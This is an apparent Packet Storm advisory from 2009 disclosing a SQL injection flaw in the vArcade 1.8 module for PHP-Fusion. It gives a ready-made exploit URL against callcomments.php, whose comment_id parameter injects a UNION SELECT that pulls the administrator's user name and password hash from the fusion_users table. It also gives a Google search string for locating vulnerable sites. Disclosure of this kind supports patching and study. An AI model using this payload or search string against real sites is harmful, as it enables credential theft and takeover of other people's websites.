PHP-Fusion vArcade Module 1.8 SQL Injection

2009-01-08T00:00:00
ID PACKETSTORM:73682
Type packetstorm
Reporter IRCRASH
Modified 2009-01-08T00:00:00

Description

                                        
                                            `----------------------------------------------------------------  
  
Script : PHP-Fusion Mod vArcade 1.8  
  
Type : Sql Injection Vulnerability  
  
Risk : High  
  
----------------------------------------------------------------  
  
Download From : http://venue.nu/  
  
----------------------------------------------------------------  
  
Discovered by : Khashayar Fereidani  
  
My Official Website : HTTP://FEREIDANI.IR  
  
Our Team Website : Http://IRCRASH.COM  
  
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com  
  
----------------------------------------------------------------  
  
Sql Injection Vulnerability :  
  
Vulnerable address : http://[host]/[path]/infusions/varcade/callcomments.php?comment_id=9999%27+union+select+0,user_name,2,3,4,5,6,user_password+from+fusion_users+where+user_id=1/*  
  
Google Dark : inurl:/infusions/varcade/  
  
----------------------------------------------------------------  
  
Tnx : God  
  
HTTP://IRCRASH.COM HTTP://FEREIDANI.IR  
  
----------------------------------------------------------------  
  
`